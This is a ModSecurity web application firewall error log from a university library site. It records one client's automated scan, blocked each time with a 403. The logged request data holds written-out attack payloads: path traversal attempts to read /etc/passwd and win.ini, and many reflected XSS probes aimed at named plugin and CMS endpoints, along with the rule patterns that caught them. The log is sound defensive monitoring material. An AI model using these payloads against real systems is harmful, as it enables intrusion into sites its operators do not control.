[Tue Aug 29 11:56:15.219297 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAArB1zcAAAAV"]
[Tue Aug 29 11:56:15.681144 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAArB1zoAAAAV"]
[Tue Aug 29 11:56:17.212872 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq5@O0AAAAK"]
[Tue Aug 29 11:56:17.213149 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAArC7jYAAAAW"]
[Tue Aug 29 11:56:17.535168 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAocygkAAAAR"]
[Tue Aug 29 11:56:18.975523 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAq3a9YAAAAI"]
[Tue Aug 29 11:56:19.681630 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAqsV7wAAAAB"]
[Tue Aug 29 11:56:21.920710 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIASEAAAAX"]
[Tue Aug 29 11:56:22.034965 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArJXk8AAAAZ"]
[Tue Aug 29 11:56:23.220093 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAArIASoAAAAX"]
[Tue Aug 29 11:56:23.555754 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAAocyh4AAAAR"]
[Tue Aug 29 11:56:23.645555 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArIAS8AAAAX"]
[Tue Aug 29 11:56:24.683173 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIATcAAAAX"]
[Tue Aug 29 11:56:26.965123 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16esCo-f0AAAqSw7wAAAAN"]
[Tue Aug 29 11:56:27.037699 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16esCo-f0AAApHRoIAAAAP"]
[Tue Aug 29 11:56:30.133678 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAArB11EAAAAV"]
[Tue Aug 29 11:56:30.535476 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAqeFowAAAAx"]
[Tue Aug 29 11:56:30.658927 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAocyjkAAAAR"]
[Tue Aug 29 11:56:33.604312 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAq@smEAAAAM"]
[Tue Aug 29 11:56:34.592411 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAqeFqMAAAAx"]
[Tue Aug 29 11:56:36.566732 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAqSw9cAAAAN"]
[Tue Aug 29 11:56:36.638978 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq3bAEAAAAI"]
[Tue Aug 29 11:56:38.719536 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hsCo-f0AAAocylMAAAAR"]
[Tue Aug 29 11:56:39.547962 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArZPxkAAAAC"]
[Tue Aug 29 11:56:39.647565 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAAq-HdUAAAAT"]
[Tue Aug 29 11:56:39.779368 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAArIAWQAAAAX"]
[Tue Aug 29 11:56:40.863235 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAArIAW8AAAAX"]
[Tue Aug 29 11:56:40.863711 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq3bBUAAAAI"]
[Tue Aug 29 11:56:42.944584 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAArIAXoAAAAX"]
[Tue Aug 29 11:56:43.657269 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAqsWAkAAAAB"]
